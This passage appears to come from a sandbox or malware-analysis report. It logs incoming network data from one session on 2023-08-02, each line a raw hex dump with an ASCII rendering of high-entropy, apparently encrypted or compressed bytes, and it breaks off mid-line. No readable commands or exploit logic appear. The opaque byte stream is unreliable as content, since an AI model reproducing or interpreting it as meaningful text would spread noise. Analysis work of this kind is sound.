2023-08-02 08:35:15 UTC	2033	IN	Data Raw: 3c be ad 2b 1e cf a2 17 b6 b2 d8 d3 75 dc 4d 01 83 57 74 2e 2e 29 68 63 12 74 73 d1 65 da 0a eb 62 c6 08 f1 80 7a af dd 39 f4 2e f4 1e 68 3e 72 c9 ad 58 b3 5b 8d 4f c3 6e e2 91 9c fb ec 4b 27 e8 4e 26 ca 2b eb 11 88 5a 00 b4 a4 cc 19 86 e1 6c 00 5d 33 fe d7 e9 b2 db f7 19 5d 9a 59 75 22 bb c7 f1 83 dc d9 6f 82 e3 a5 90 cb 9c 1c 29 8a 6c e5 9a 0c 4d ed 67 c7 43 36 31 36 f2 61 c1 0b d8 48 32 5e a8 52 21 13 ca 30 20 d2 8f ea 6e fe e1 3d 87 ae 35 3b 8b b8 98 3f dc 76 20 1c 3b 47 1b c6 ac 11 6a 52 5e 61 15 aa 35 89 76 dc f9 10 df 4b eb 68 a7 66 4b 37 96 1e 8e 08 27 95 bd dc 87 1e 67 fa 80 50 71 8f 73 b5 b8 9a 6e 56 b2 32 69 1b 55 5f a4 04 1e ff 72 4e 2a 58 93 55 ba c4 12 11 eb 6e 7c f5 c8 92 7e 68 06 f4 67 4c 79 72 45 45 86 45 50 72 a1 3f 09 50 d3 42 28 8f 1d Data Ascii: <+uMWt..)hctsebz9.h>rX[OnK'N&+Zl]3]Yu"o)lMgC616aH2^R!0 n=5;?v ;GjR^a5vKhfK7'gPqsnV2iU_rN*XUn\|~hgLyrEEEPr?PB(
2023-08-02 08:35:15 UTC	2049	IN	Data Raw: cd e4 4b 5a 7b a7 b9 e8 46 b5 35 de c5 a6 e5 a8 0f 77 31 3f 87 df f6 8b 66 52 31 f8 6d 88 44 ac 70 85 81 ed cb 43 3b ad 29 ab 01 79 4e e8 0a bf ca 75 48 52 fb c2 93 78 46 4b e7 b6 5f b6 b1 5f 51 62 cd 4a 91 c7 43 b4 1e 0f be 4b e7 8d 9f c5 71 b7 90 f4 31 31 9e cd bd 07 c8 cb d0 f6 c6 0a 56 52 5b 05 5f e8 ee 59 79 db 62 ba d2 5c cf bc 91 c7 2b 1f 21 48 a6 85 6f d1 8d 52 cd cf 26 b3 f1 5e 23 39 35 9e ca 33 af 5b be ca d0 6d 9a 33 80 34 8b d8 1e 31 e2 46 2f 18 a2 8f cf 17 64 e0 6e f1 7b 73 a8 1e bc 76 8f 80 88 b7 19 58 8c 25 4d 34 ec 78 79 5c 45 24 28 27 fd ad 99 5f 4f f0 8e 7a 71 bc c7 8b b4 4c 48 44 93 41 93 8d cd 94 c7 25 87 cd b6 e9 81 8a 7a b0 66 9b 68 4c e6 9f 57 56 39 0f 09 9c 7f c9 a1 c6 81 9b f9 78 8e 62 50 3f 67 fb fe e4 4b 10 37 b7 6f b4 c9 b9 84 Data Ascii: KZ{F5w1?fR1mDpC;)yNuHRxFK__QbJCKq11VR[_Yyb\+!HoR&^#953[m341F/dn{svX%M4xy\E$('_OzqLHDA%zfhLWV9xbP?gK7o
2023-08-02 08:35:15 UTC	2065	IN	Data Raw: c2 94 c4 4a b3 2c f0 0c 17 82 db ac cb 51 56 d5 28 98 60 0e d2 3e 15 4a d0 2f 5e 78 69 62 32 7b 76 8c 60 dd de 73 e6 ff 4f b1 08 4f cf 12 1a d1 19 2f aa 5a 58 d7 e2 3e df 1b c2 8f 80 a4 6a ce 89 0d 48 ed c8 5b 6b 1a c6 e1 fe 00 29 81 f4 d4 0e 8d e1 da 43 0f 34 94 71 8f 84 96 dc 32 ba f2 63 37 2d 88 1c 36 61 41 2b 3d 34 24 61 fe 08 6f 23 fc 32 8e d8 b6 e2 62 f2 7b 96 2e 9c 07 0a e9 1e 7a 9a 5b ba 31 23 65 cf 87 8b e2 fd b9 b6 7e c4 a8 9d 1c d5 58 3f 37 10 3a 9d e6 f4 3a 06 f4 4b d1 79 8c 01 ca fa 7a 0c 95 a8 64 e9 d5 6d f5 86 98 76 3c a4 71 1b 38 87 8a b5 16 6d 7c 22 2a 5e 18 9b 8f 9c ee 9c 4a 07 12 5a c5 8a 96 3e ff a5 f9 63 ee 4d 00 8e 45 fa 86 e5 27 f3 a1 87 7e 97 04 13 02 50 d8 c2 31 12 d0 a1 c4 53 93 42 5c 6c 7f 3a 39 63 f5 8c 2e 32 e0 a4 4d 4a 14 e5 Data Ascii: J,QV(`>J/^xib2{v`sOO/ZX>jH[k)C4q2c7-6aA+=4$ao#2b{.z[1#e~X?7::Kyzdmv<q8m\|"*^JZ>cME'~P1SB\l:9c.2MJ
2023-08-02 08:35:15 UTC	2081	IN	Data Raw: b1 12 9f 10 7a 2b 8a b1 53 69 70 40 85 5a 73 de 6a 2a 90 45 a8 4e 6b ad 90 58 cd d0 b2 2d 87 db c3 44 92 8d 6c ce 99 e6 11 5e 69 7c b1 b9 4f cc fb a9 77 9f ab d5 9d 46 bf e8 5d 6a fd 37 cd 92 7b ca 47 e6 b6 6c e8 9f af 13 91 66 ea 91 67 2c 33 83 25 9f 01 bb 16 e9 87 8e 02 98 94 64 a7 be 4e e7 79 50 a1 0f 23 a4 08 a8 78 5a cd 76 3a 8d 8e ad 99 a3 de 83 23 dc f0 4a c1 c5 03 64 47 b2 0f 8c 00 3b be 64 a1 b3 e7 11 0d 49 36 22 3b e1 10 3a 8d ef 8b 67 e1 62 91 9e e9 59 37 78 94 6f 78 c3 3f be 40 39 fa 32 d2 b1 8f 64 3a 39 16 2b da 5d fb 08 eb 80 02 64 2d d0 c0 ea eb 2b 4c 2c 2a f5 6a a7 c0 3e 79 63 20 5d 7a 63 88 45 0c f4 90 fb 43 48 84 bc ec fd 07 7b 35 8f 33 d8 48 ef af b2 2b f1 dd a2 da 3a fb 3e 37 89 f3 be b9 cd 79 a9 e4 db d6 8c 32 d3 04 58 08 62 d1 f9 0e Data Ascii: z+Sip@ZsjENkX-Dl^i\|OwF]j7{Glfg,3%dNyP#xZv:#JdG;dI6";:gbY7xox?@92d:9+]d-+L,j>yc ]zcECH{53H+:>7y2Xb
2023-08-02 08:35:15 UTC	2097	IN	Data Raw: 6f 0b af 74 64 ab 28 ca bd 35 30 55 7b 7d 6c c9 56 35 73 ba 11 5b 34 2a ff 6d 0b 30 d9 3a 83 fc fd f1 d8 fe 13 4d 97 87 c4 82 4d 84 68 05 1b b0 66 96 ca b7 d8 62 b8 3a c4 9c f3 fa 0d 50 a8 3e 19 b0 4d 7f 59 c0 5e 8d 4e 49 3e 98 5b fe 97 ca 40 09 44 4c 17 c3 dc 44 22 f1 2e 1a 21 cb 87 24 af c8 ab 5e 5f ff 05 3c 40 56 b0 9c 37 a3 33 df 4a d2 e9 09 db 7b 0c cc ee 5d e4 1f 3e dd 43 d4 a0 38 99 d6 20 5a 26 8c e1 f4 b5 9e 77 e1 fd 1a 4c 3a 67 b4 cc ce c8 86 bb 18 2a ae e8 f4 c8 40 a0 e8 45 ad 47 3c 91 98 68 16 7a ad 39 6b a9 0a 83 57 bc a3 47 51 c8 af e3 d3 48 b1 2b d0 1f 93 9e 53 8f df fb 68 f3 60 5a 7d a4 dc 99 1e ed 34 35 c9 aa b4 da 0d 6f 8c 41 3d 86 fb 09 75 a9 c2 69 ab ea 37 61 bc 75 bb 37 e8 86 f5 29 9d 21 1e 7c 5d ea 7d 54 db ab ad f1 54 8e dc 2d 29 99 Data Ascii: otd(50U{}lV5s[4m0:MMhfb:P>MY^NI>[@DLD".!$^_<@V73J{]>C8 Z&wL:g@EG<hz9kWGQH+Sh`Z}45oA=ui7au7)!\|]}TT-)
2023-08-02 08:35:15 UTC	2113	IN	Data Raw: 30 d5 4d 61 58 8f bd 92 56 c3 53 96 5a 11 ef 06 bb 68 7d 0e 9d f8 1c 06 c8 60 df 15 fb 0b d6 32 3a 03 1e 3a 3a ae 92 c7 99 c7 d9 38 56 7d 81 7e a8 86 ce f4 9c 35 7d 5e cc 56 9e 7c 39 da a6 74 b6 90 68 d1 3c aa 89 40 4e de 7c b3 b9 4e 3c 79 4a a6 b1 1a c2 eb ca 6d 8a 17 ad 15 25 26 6d c6 38 49 64 13 7e 57 f3 04 90 b7 5f af c4 ff 3c da cc c5 cb b9 0e 63 83 cd 5d a8 d1 49 e4 10 4c c4 17 cf 2e 11 ef 5d f2 7b 09 95 8e 9c 5c ca 67 5d bf 9c ed 91 1f 5f 8a af 88 67 9c 77 8b 7d b1 f6 a7 8d 57 31 50 d0 8f 27 9f b1 dc a9 89 8b fe 9a a0 0b b8 35 ed 8f 34 6c 43 2f 3f 7b d2 68 16 af 81 80 f0 f7 cd 99 6e b7 37 f6 fb 65 f9 62 c9 07 6f b3 11 64 01 00 a7 63 be ce 28 02 73 aa 74 95 79 a7 80 f6 b7 b4 73 df 2b 38 0b 9b af 3c e9 64 7a ca d5 ae de f0 fe f5 e2 38 77 87 4b d3 f8 Data Ascii: 0MaXVSZh}`2:::8V}~5}^V\|9th<@N\|N<yJm%&m8Id~W_<c]IL.]{\g]_gw}W1P'54lC/?{hn7ebodc(stys+8<dz8wK
2023-08-02 08:35:15 UTC	2129	IN	Data Raw: 17 ac 97 f8 2a 26 09 bb 3d c1 6b 3e 8b 2d ed 85 36 23 b2 d2 7f 8f 7c de f1 96 18 79 ba d4 1e 7b 77 0d 09 f3 0f b3 29 a7 7b 61 c3 14 7f 15 53 21 ac 1f 06 12 c0 8e 07 a8 7f 9f 3b 67 86 aa 00 3d d1 d4 24 37 8a 88 f9 bb 1d 48 e7 de d0 b6 80 4e 51 1b 1d 3d b3 6a 53 a1 da 04 4a 60 90 f8 99 54 5d 30 40 35 63 34 3e 77 fd d8 ff 3d a8 fc 67 27 c8 34 3d 9d 08 fe 49 bd e8 fe 3f 61 1e f5 57 8b b8 18 57 60 99 b3 2d 48 3e 9e d4 b7 66 3a 42 48 89 3d eb 2f 56 00 00 2e 94 44 ea 44 c0 fc 4a d0 01 0a 27 93 8f 6b b6 47 44 41 23 10 c4 21 13 09 01 a7 ab e1 20 3e 3f 68 78 77 4f d8 35 73 d8 f8 c8 18 81 e1 c8 25 0a 88 51 2a 89 e1 69 9a 1d f9 91 1b a4 df 61 e5 a0 cb 6e b2 7a 4d 9c 3d 5a d4 cb 8f 7a 8e 94 41 10 4e ae c1 30 86 e1 3c c3 ba 81 20 e1 13 2e 27 6c 13 ad 2d 41 f6 3c bb d6 Data Ascii: &=k>-6#\|y{w){aS!;g=$7HNQ=jSJ`T]0@5c4>w=g'4=I?aWW`-H>f:BH=/V.DDJ'kGDA#! >?hxwO5s%QianzM=ZzAN0< .'l-A<
2023-08-02 08:35:15 UTC	2145	IN	Data Raw: 32 31 84 3b e8 af 66 53 9a c7 b9 5e bc 4a e7 fe 22 a8 ce 3c 6a 87 e6 7e d0 3c b0 55 c1 d3 7b 29 c3 36 9a 95 f2 a3 36 ab b7 1f 5c 4a 2b 65 3f a6 62 65 b0 a2 f0 fd a5 b3 0b 8e 76 3d 94 9e 3a 18 d8 5f eb 87 b6 b3 fd 89 ea d6 11 38 61 03 1a 8e 16 18 12 c9 a4 ae 8f 1a 98 b0 d4 9f 44 ff 77 5e e9 9f 51 9c 09 e4 f9 ba 56 0e 37 1f ca 3e ab a6 ae e2 9b 0c 1f 73 99 12 2a e3 65 12 e7 76 39 7b 0d 5c ef 13 8f 25 0b 8a 0e eb dc d5 86 7a 58 76 77 94 4a 52 5e c9 93 83 14 3a 05 61 b7 51 9e 94 21 5b 67 66 0e 20 d2 fd df 07 b2 1f 19 29 8e 03 df d6 08 c2 0f 33 6c 5d 3b 57 37 ce 7f 2e 36 99 7d 82 f2 e3 5a 81 0d 64 a2 92 71 e6 e9 95 fa 21 ca dd cf 94 ec 2e 62 b0 fe 5e fb 02 7b 09 f0 08 0a 63 20 7d 1f 86 f2 fe 04 03 e0 88 e1 62 07 c0 d1 b2 0f f2 fe 13 73 7a 03 71 5f cb 81 f6 88 Data Ascii: 21;fS^J"<j~<U{)66\J+e?bev=:_8aDw^QV7>s*ev9{\%zXvwJR^:aQ![gf )3l];W7.6}Zdq!.b^{c }bszq_
2023-08-02 08:35:15 UTC	2161	IN	Data Raw: 36 2b 4c b7 6c 31 ac c3 ed 9a 2c 6e fb fe ad 48 ac 39 9a 7b b7 e6 01 c4 ee 74 c5 6d 58 0f e4 a2 63 a4 f8 40 d7 5e 03 05 98 bd 82 47 27 d0 d4 71 9d e5 07 9f 20 c2 41 b3 3a 92 8a 6e 55 18 18 6a d4 68 ef f7 4f 88 89 7b 5e 39 e7 eb d9 e7 9a fa fb 0d 81 3f 36 b9 2b 50 77 ea 3b 35 75 b2 87 cf 99 a9 b8 dc d7 75 8d c2 6f da db d2 3d 7c 27 b5 b3 e7 f0 42 ad cb 06 d3 27 d8 f1 00 e8 e8 57 29 65 a2 5e 58 6a 0f 22 10 99 7c e8 b1 ca f0 78 d6 1d 44 5a 21 a9 ab 7e 2a 34 33 fc 64 d2 5a 04 63 45 51 30 18 0a 12 22 b6 33 fd 7e d6 75 2c 72 de e8 5d fb 2c 7c b4 81 71 1c 66 bc 27 19 1c 77 d1 69 63 22 c8 27 e8 8d fe 3f 9c 84 5c f0 dc ef 10 bc ae 34 b5 18 f0 05 1b ee 8e 58 53 be b2 99 b3 01 fe b1 d2 a1 75 05 98 01 4a 0a 17 54 9e f5 6d 52 fb 45 44 e2 ec a9 f9 45 a0 f4 57 fa e7 5c Data Ascii: 6+Ll1,nH9{tmXc@^G'q A:nUjhO{^9?6+Pw;5uuo=\|'B'W)e^Xj"\|xDZ!~*43dZcEQ0"3~u,r],\|qf'wic"'?\4XSuJTmREDEW\
2023-08-02 08:35:15 UTC	2177	IN	Data Raw: 17 2e ff 00 0f 8f ff a8 0f d1 17 84 9d b9 71 f5 a9 4d 63 bc 8f bb 9d 0e 40 11 5e 56 52 bf 6f cd 1e cf 9a 6b fc c8 1f 4b f3 97 47 74 5b 68 4a 29 03 cc c2 14 2b f5 5a d6 e1 88 f3 a9 ab e9 69 ca 0d 44 ec 53 75 5d e8 e2 a1 b6 4f 04 ad 65 f3 36 1a 4d 97 0c a1 0d 6d e2 73 a1 0a f3 5a 32 b5 b8 c7 be d7 44 ae 2d 85 f3 0a d8 c0 92 23 31 29 21 62 a5 be 76 e5 8e 3c e7 a3 d8 69 d3 13 39 77 2d d8 f0 23 a4 e1 3a 7b 4c e3 f5 62 b2 e5 51 3e 63 01 c0 09 a8 14 b1 e0 88 54 f4 28 22 b8 7f 2e a3 32 9d 89 76 e9 55 06 41 25 c8 a9 33 1f 03 9d 12 26 bc 52 2c 60 ac 54 28 dd c5 8d cd f4 d8 d0 53 8e 58 9b d9 fd d0 45 2f 0e 95 51 f9 ac 5c 95 e3 75 44 c5 58 ef 0c bd 99 21 c6 ca 0b 94 48 07 86 21 f1 ad 34 34 46 8f d7 fa 27 b7 b6 e2 33 5d d1 18 52 b9 4f 36 ec 29 26 b6 52 74 8e be f6 95 Data Ascii: .qMc@^VRokKGt[hJ)+ZiDSu]Oe6MmsZ2D-#1)!bv<i9w-#:{LbQ>cT(".2vUA%3&R,`T(SXE/Q\uDX!H!44F'3]RO6)&Rt
2023-08-02 08:35:15 UTC	2193	IN	Data Raw: ae 36 55 af e7 fc da 25 f2 4b 4a ef 4e b9 ea 90 25 cf 25 b6 5e 16 bd 80 4a 8f 6b 2e 03 cf d8 1d a3 22 e2 cb 0f eb 5b 7b c0 ca 04 e0 bd 88 a4 d9 d6 44 1d 26 2c 44 85 13 3a 50 73 84 52 30 12 64 db c5 1c 92 a8 bc b3 58 f3 3c f3 6d 54 b5 c4 fc 49 cb 03 48 80 70 a9 42 7c ed 70 48 57 df 9f 83 81 f5 41 f2 10 aa 44 2e c5 d2 b1 22 78 50 cb ce 8f e8 d0 1d cb f5 5f 6f 38 88 d5 50 0f 00 80 d9 99 f3 a7 6c c2 ae f9 74 2b a7 50 6b 48 1e d5 70 8a da 75 9c ea fc 9b 66 2a 83 14 4b cc 24 7b b4 62 e0 b9 10 1e 80 5e d2 03 28 ef c6 93 e2 a4 61 39 1b c4 26 30 53 da 20 50 9e 81 11 d6 3c 1e 47 45 35 e5 c9 80 6e 36 00 c6 7c c8 7f 6c 98 16 79 5d 09 ff 29 5d 83 45 b7 40 95 ca e2 5e 07 ef 5d f4 a2 16 75 40 6c aa c9 ec 0e a7 27 d5 21 7b 7c 08 58 8e c8 f9 60 01 d5 be 9f 58 1f 37 89 19 Data Ascii: 6U%KJN%%^Jk."[{D&,D:PsR0dX<mTIHpB\|pHWAD."xP_o8Plt+PkHpuf*K${b^(a9&0S P<GE5n6\|ly])]E@^]u@l'!{\|X`X7
2023-08-02 08:35:15 UTC	2209	IN	Data Raw: 85 81 95 55 c3 bf cd 2e e5 3f f6 89 7b 1a 92 29 31 7d 1a f7 d7 84 2a b5 18 1b 1a de 0e 01 be 2c 5c 72 25 3f b7 7d e7 c6 b8 f1 68 54 cb eb 7f fe 48 00 50 c7 2c a4 69 60 f2 4b d7 66 18 ef 7d c0 23 73 0a bb dd 22 5f 14 05 9d fc 65 ca 92 22 bd 94 42 21 ec a9 44 a2 20 c8 77 ed a2 c6 55 bf 10 0d eb 6a 77 fc 0e 28 27 74 9c 66 83 82 7b 9d 3d a7 1c b5 8a f2 3a b1 57 b9 9a 9a d7 cc 80 eb f4 63 f4 88 c1 fd 14 a1 c6 37 db 3d fb 36 ee b0 5c 4a 2b 65 bf cb 64 90 33 b2 1a 6c 9e c9 0a 5b fd 97 da 46 57 ff 71 cc c3 c6 ba bd 84 c2 6e 5b a6 8a 08 3e 8b 37 25 ed 1a d3 f8 f1 a9 52 44 56 f5 60 74 1e 4f fb 58 92 c2 33 c3 85 bf 07 42 9f 34 b9 f0 78 ff da a9 2c 52 32 ce 23 6f a6 3a d8 78 51 4a 01 28 23 84 c0 63 f6 48 79 d0 34 ac d9 19 a9 68 04 88 a9 eb 81 5b c2 da 7e 5e b5 5a 30 Data Ascii: U.?{)1}*,\r%?}hTHP,i`Kf}#s"_e"B!D wUjw('tf{=:Wc7=6\J+ed3l[FWqn[>7%RDV`tOX3B4x,R2#o:xQJ(#cHy4h[~^Z0
2023-08-02 08:35:15 UTC	2225	IN	Data Raw: 36 cf c5 4a 85 d4 ad 35 80 ae 0e 35 15 43 78 bf b2 22 5d 20 61 d0 f9 38 82 d6 f3 94 40 17 86 a4 99 e5 01 18 61 81 62 bf 12 2b 0d 64 7b ba f6 98 81 f0 29 f7 b6 8b 95 5f 5a 49 1e 5e d7 6b 8e 1d 66 d0 28 3f ae 54 f2 f5 f3 9f d9 2f 41 72 0f 82 8f 15 ca 4b 0a d2 93 63 71 2b 0d c1 fb 63 5c 66 72 08 88 e1 63 4d 3d bb 28 36 0c a9 72 52 89 96 64 d6 a5 4c 4a 9b 48 ca e2 5b 08 9a 8c c8 29 cb 12 17 24 1a 89 5b a5 fd 5f 21 1a 54 70 bc 15 e4 5f 36 c0 56 f9 76 4e ee ad f0 14 87 20 87 b5 0d 3e b7 f8 68 6a 44 ce 3e d6 13 f5 d5 b5 14 4d 9d dd 19 10 d9 02 71 77 2d ca 5e 1d 8e d3 89 b9 8f 6a 26 d9 32 0b 5b e0 5f 32 f9 a8 43 c5 cd 61 f7 05 4e f8 24 46 7a 90 7f 33 0d 5f da 99 5f e2 3d 43 fc bb db 80 23 b4 fc e6 c7 cd b3 72 ed e9 08 fa 4d 4e 34 e9 13 2b 37 8e 86 08 60 7e 23 7e Data Ascii: 6J55Cx"] a8@ab+d{)_ZI^kf(?T/ArKcq+c\frcM=(6rRdLJH[)$[_!Tp_6VvN >hjD>Mqw-^j&2[_2CaN$Fz3__=C#rMN4+7`~#~
2023-08-02 08:35:15 UTC	2241	IN	Data Raw: 26 71 7e 2d 79 de af 8b 2d 02 5a 5e dd 6f 54 72 0d ff c9 75 ed 23 33 02 df 36 2a c6 bb 8a 6a e2 b3 69 d5 bb a1 39 d8 d7 18 ba 42 ee 98 d3 be 3b 24 2f ca f8 c0 07 50 08 f8 2f 81 ad 06 af 67 e4 42 80 52 97 31 44 03 d7 08 21 5c 4e 7e c8 eb 64 07 e2 7b 72 0c a0 17 49 4e 9f 9d 7f 7a ad a1 ea 7e ea fb 0f 5c 45 da ff af b3 bb 2a ec 20 1f 7f 1d e7 80 fd 40 2c 5d 46 0f 4a 76 8b 35 3d b7 d5 51 bd e2 3a 4a fb 43 52 b8 0c 14 18 72 4e 0c 06 26 1f 1d 84 ec 4c 58 4a 4c f6 15 58 c1 95 cf a8 29 bd dc 2f 30 39 f0 93 5f 40 80 79 8d b8 14 45 23 c7 43 a8 35 3f ea db 6a 59 a6 72 d7 5d 65 85 b0 05 e3 7f 33 c9 6a a0 c3 a5 c1 f1 24 43 de b6 61 9d 87 e4 34 a4 d0 22 1d 5e 5e a9 9a 5e 7d 36 d9 dc 7f 77 22 6f 10 95 fa d8 90 5b e9 f0 3e 72 65 47 95 5b dc f7 f1 32 63 8f 70 8c 8c 30 2d Data Ascii: &q~-y-Z^oTru#36ji9B;$/P/gBR1D!\N~d{rINz~\E @,]FJv5=Q:JCRrN&LXJLX)/09_@yE#C5?jYr]e3j$Ca4"^^^}6w"o[>reG[2cp0-
2023-08-02 08:35:15 UTC	2257	IN	Data Raw: 13 71 5e 02 dc 6d 0b e6 97 42 3b ca d0 c6 f3 28 a8 77 7e 64 5c e5 da 3b 82 58 3d 52 37 cf 50 f0 5d 0b 2f b9 4e ef 01 40 ea 78 be 27 32 0b 41 32 b8 54 bf 36 7e 01 ed ef f9 06 22 d7 9e 4a a9 14 27 01 a4 dc 5c 53 bb 36 ff e3 ae 39 96 b1 99 b8 17 1f 4d 6e d5 8e 99 3b 30 74 8e 5d 40 1b 25 f4 1b 3c c1 b9 9b 49 39 00 0a 2b 34 a9 f5 be f2 71 ee 6f e1 15 b8 8e d9 ed c4 7f 58 53 f9 f7 bf 97 5c c8 e7 07 54 57 94 62 f7 54 87 bb 5a 33 3d 83 ce cb e4 b2 a3 42 11 03 70 52 69 dd 94 cb 0f fe 46 4e 4c cb 20 2e 38 e4 19 63 c5 b0 88 62 ec 47 d1 50 e2 ee 55 7d 46 74 c0 f9 00 62 0d e5 92 e2 81 5e f3 5a 5b b4 23 ad 67 f9 5e ce 35 74 62 b4 62 17 a4 27 95 06 b4 b8 e1 c9 41 3c f5 f4 29 1d 26 88 0f 96 52 d7 5c 5f 08 16 2f 93 f3 d9 6a 18 84 d8 6d 46 75 f7 bc dc 7b 50 6f d0 f6 2b ea Data Ascii: q^mB;(w~d\;X=R7P]/N@x'2A2T6~"J'\S69Mn;0t]@%<I9+4qoXS\TWbTZ3=BpRiFNL .8cbGPU}Ftb^Z[#g^5tbb'A<)&R\_/jmFu{Po+
2023-08-02 08:35:15 UTC	2273	IN	Data Raw: d5 2c c4 2e 4c 29 83 e8 e5 2f 59 50 77 d4 07 05 c1 fd fb 3f 92 18 5d 46 bc 96 da 79 6c 9a 6e 18 da 7e d2 38 00 02 d1 23 07 d1 5b af 25 71 ad 4b 10 0a 75 00 79 bb 20 6b 70 1d 3f 1a 6f a8 81 2f 67 a9 8b 45 a8 3b f6 c6 dd ff a9 40 3e ca 2b cb 50 c7 99 45 4c a7 64 4f 2a bd 46 c0 c4 fe c5 df c2 d0 bf df 7f 90 87 bc be e5 6f ab ba aa 7b 00 77 3b 50 95 35 ce d3 80 b3 af ae 48 48 51 19 44 09 3e d8 14 38 f0 b3 86 f0 72 d5 68 d9 38 2d b5 3d 4d 2a d4 6b b7 96 24 a5 d9 7e 2f ea 94 2d c5 cf f6 3a b7 e4 5f 85 7b a4 3d 00 ca e9 08 79 4e 74 44 bc c3 63 3d 75 a5 b9 22 db 30 66 00 13 01 da 8b 93 78 24 9e 1a 41 57 10 22 27 a6 02 d3 81 32 a8 86 f2 e8 d6 ef 19 61 f9 67 57 93 a8 0d 4d bd bb 9d 24 4d 98 6a 21 e9 22 0c 6f 1e 84 b2 d3 e3 59 02 09 8b 71 7e db 4f 2c 62 5b 2b aa bd Data Ascii: ,.L)/YPw?]Fyln~8#[%qKuy kp?o/gE;@>+PELdOFo{w;P5HHQD>8rh8-=Mk$~/-:_{=yNtDc=u"0fx$AW"'2agWM$Mj!"oYq~O,b[+
2023-08-02 08:35:15 UTC	2289	IN	Data Raw: 59 a0 b3 e6 9c e0 37 11 33 b9 bf 9f 8b 42 aa cc 8b ba 4c 9f d2 68 84 a6 e2 e0 72 a7 e4 1a c4 e9 e6 c2 16 4e 33 3f a2 37 0f 6b a7 81 d6 56 fe 16 8f d8 5f 13 f0 1e a1 7d 78 43 a2 18 61 11 ec 53 88 63 c2 66 da 25 6c 00 50 bc 96 ad 5d 13 f9 72 39 28 8b 46 8d b2 ba 06 a4 e6 fa 74 9d 3f 65 35 e8 d7 ec 0d 92 02 0c 20 4a 95 26 a2 85 94 4f f5 20 d7 1c 77 e2 69 84 e2 0c d1 c4 8d 04 0d f1 a0 ab 24 d7 51 e6 2a b3 9e a8 02 4e a0 b5 2a 22 5f 36 b3 1a e2 25 68 31 3a 61 68 6c bd 1f c0 74 18 27 41 18 24 cd 17 fc bb b9 5a e8 ed b4 69 26 34 38 a9 72 5d 39 d1 b3 f4 e4 80 4a 39 0c e8 4d 83 93 95 19 4f da f5 92 68 ea e8 2f 19 ae 6d 91 02 40 2a ae fc 8a ee a4 72 c5 8c 76 02 ab 58 f2 a4 67 37 6c 01 6e 31 d0 f7 e8 43 9d e1 a2 53 96 78 93 f3 38 02 bd f0 2b 5f fe 7f 42 21 98 71 8c Data Ascii: Y73BLhrN3?7kV_}xCaScf%lP]r9(Ft?e5 J&O wi$QN"_6%h1:ahlt'A$Zi&48r]9J9MOh/m@*rvXg7ln1CSx8+_B!q
2023-08-02 08:35:15 UTC	2305	IN	Data Raw: 09 4f b8 85 d6 3d 26 47 2f 0e ff f4 07 13 af 1c 94 28 af 31 98 d6 b5 1a 98 7a 20 96 3e ab 0e 25 52 6a 50 c4 e4 db f0 55 ce 02 12 58 12 4e 72 24 6e c0 af e4 d1 21 a8 44 9a 4e b8 f7 b1 c9 a1 d1 15 67 f8 5e fc cd 9c d3 ff 30 a3 fd b7 02 d6 6a 76 38 30 45 ac b5 0f 82 50 37 50 61 b8 db a0 34 bf 04 93 cb ac e8 22 c4 12 8a c4 14 7f f6 20 2a d3 fc 55 40 d1 c0 ec 8e 85 c3 2a 16 53 d0 31 a1 47 5d 04 c7 cf b9 84 96 54 dd b0 0b ab ee 8e 6d 4b 1c a3 3e 8d 59 bd 8c ad a6 52 89 01 c7 ef ff 30 97 be c2 9f fe c9 04 34 5b 53 4c e0 40 68 cb 91 36 77 d6 84 67 79 56 74 45 71 3a b3 b7 18 d1 ae f8 31 74 8b a9 a2 a9 30 44 a3 be 40 c8 50 b7 99 02 d6 23 93 20 49 20 18 ee 9a 85 0c 6f 97 41 ec 90 d2 bd d1 f0 3b f6 7f 7a 25 50 12 f4 e3 3d e8 d2 e9 01 8a 42 25 06 f1 8a 98 9d bb 5a 10 Data Ascii: O=&G/(1z >%RjPUXNr$n!DNg^0jv80EP7Pa4" U@S1G]TmK>YR04[SL@h6wgyVtEq:1t0D@P# I oA;z%P=B%Z
2023-08-02 08:35:15 UTC	2321	IN	Data Raw: 67 88 65 d2 2f 8e f8 b1 a8 0d 13 6b 81 0a 5c 30 17 ce 4a 7a f7 b1 7c 6d 92 89 3a 82 f8 14 af 5a 42 34 86 bf 43 80 79 5d e3 61 96 f2 e8 62 de c1 4a 9b 1f 49 7b 7a 61 75 d7 56 98 a5 44 d9 2d 02 97 bb 37 78 8b 10 6f 21 0f e7 d3 e0 73 f1 39 80 72 f7 92 16 55 04 31 04 99 a9 73 4a 9d 6f db 36 c7 0a 48 2d c1 dd 3b cb 06 9a b0 70 a9 e5 17 28 2c 13 ca 89 bb 9a 74 b9 e5 3e da 6f ba 6f e5 27 60 b4 d1 bf ad 78 4b ce b2 13 87 a2 69 4c 39 4d 04 4d fe a4 4e a1 35 c3 81 3f b8 ae b0 a2 64 9e 56 f4 84 a2 58 e7 d4 ee 21 18 fd 76 05 ee 61 ba aa 17 c0 f2 ba 10 00 c3 dd 49 8d 9c 6c 2c f4 f8 46 08 cb 13 f8 37 8c 25 30 af 7f 44 9b 5a ef d3 b8 9e 00 87 e4 b3 19 2a 69 0a 1a 8b 57 01 50 68 88 4a c0 40 3e 96 10 60 07 96 7b 85 9c ce a1 49 d3 dc 37 ee be 3c c8 cf 9c 68 86 ae d1 c9 5b Data Ascii: ge/k\0Jz\|m:ZB4Cy]abJI{zauVD-7xo!s9rU1sJo6H-;p(,t>oo'`xKiL9MMN5?dVX!vaIl,F7%0DZ*iWPhJ@>`{I7<h[
2023-08-02 08:35:15 UTC	2337	IN	Data Raw: 85 5e cc 77 c0 21 de af 7d 33 52 ee ed c1 01 20 88 ad 46 7e 7d bf cd 0a 70 98 76 60 f9 6b 6e 29 27 8f 8b ed 8d 9e 28 8f 3f ff b5 9f 0f 5d c8 e6 d1 1e 03 fd 30 84 fd 28 ac f0 53 74 f2 ee e7 c1 98 08 f9 d6 93 9c 16 90 38 f7 f2 9b 20 48 cc 34 e0 5e db 6b bd c7 ae ef 2e b0 de 7c 34 51 25 ff 5e 09 29 b2 79 35 04 8c 57 99 51 b3 3c aa 05 46 e5 8b 83 5a 3d 41 aa 61 95 28 e2 30 69 6c 19 f1 c2 1d 3c cc 1f 1b 93 af 48 e8 ee eb 37 3f e6 86 be 55 f8 57 cf ce 23 34 22 97 d3 7f 4c 36 14 a6 bb ce 76 03 1b 0d 3d d2 36 31 92 97 c0 a3 24 e0 48 8d 43 d1 c9 65 ce aa 50 84 eb 3a f8 2a d5 f4 d3 bd f9 94 96 01 1c 10 39 a1 b9 8a 22 a1 af 29 9a df 7a 20 bc 17 71 d2 ec 25 52 74 ab 16 65 3d bb 